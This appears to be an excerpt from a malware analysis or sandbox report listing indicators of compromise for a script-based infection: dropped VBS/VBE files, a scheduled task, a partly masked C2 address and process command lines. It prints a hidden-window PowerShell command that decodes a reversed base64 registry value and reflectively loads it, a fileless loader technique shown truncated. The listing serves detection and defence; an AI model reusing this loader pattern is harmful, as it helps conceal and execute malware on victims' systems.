Technical Information
- <SYSTEM32>\tasks\xfdealsupnsxxte
- %ALLUSERSPROFILE%\fichier_reconstitue.vbe
- %APPDATA%\xfdealsupnsxxte.vbs
- '34.##9.100.209':443
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\Fichier_Reconstitue.vbe
- '<SYSTEM32>\wscript.exe' "%APPDATA%\xFDealSUpNSXXtE.VBS"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\xFDealSUpNSXXtE';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L...
- '<SYSTEM32>\taskeng.exe' {956ED2DA-D1E5-4AC6-8DD1-E5CD9B82DB6B} S-1-5-21-3691498038-2086406363-2140527554-1000:arnejlje\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $ll='HKCU:\Software\xFDealSUpNSXXtE';$v='test';$ee=gp $ll;$uu=[Convert]::FromBase64String(($ee.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::L...' (with hidden window)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\xFDealSUpNSXXtE.VBS"' (with hidden window)